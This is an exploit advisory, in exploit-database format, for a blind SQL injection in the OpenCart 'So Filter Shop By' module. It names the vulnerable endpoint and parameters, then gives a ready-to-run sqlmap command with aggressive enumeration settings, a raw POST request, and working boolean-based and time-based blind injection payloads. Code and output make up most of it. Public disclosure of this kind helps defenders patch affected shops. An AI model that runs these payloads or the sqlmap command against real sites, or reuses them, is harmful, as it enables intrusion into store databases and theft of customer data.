# Exploit Title: OpenCart v3.x So Filter Shop By - Blind SQL Injection
# Date: 28/06/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://codecanyon.net/item/so-filter-shop-by-responsive-opencart-module/13945633
# Version: V3.X
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
So Filter Shop By Module is compatible with any Opencart allows SQL Injection via parameter 'att_value_id , manu_value_id , opt_value_id , subcate_value_id ' in /index.php?route=extension/module/so_filter_shop_by/filter_data.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Sqlmap command :
sqlmap -u 'http://127.0.0.1/index.php?route=extension/module/so_filter_shop_by/filter_data' --data "att_value_id=saud&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud" -p "att_value_id" --method POST --level=5 --risk=3 --dbs --random-agent
Request :
===========
POST /index.php?route=extension/module/so_filter_shop_by/filter_data HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive
att_value_id=1&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70%2C72%2C75%2C74%2C73%2C71&product_id_in=70%2C72%2C75%2C74%2C73%2C71&subcate_value_id=&text_search=saud
===========
Output :
Parameter: att_value_id (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: att_value_id=-7402) OR 6808=6808 AND (4992=4992&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: att_value_id=1) AND (SELECT 6365 FROM (SELECT(SLEEP(5)))qqBP) AND (7704=7704&category_id_path=80&condition_search=AND&isFilterShopBy=1&manu_value_id=&maxPrice=1&minPrice=0&opt_value_id=&product_arr_all=70,72,75,74,73,71&product_id_in=70,72,75,74,73,71&subcate_value_id=&text_search=saud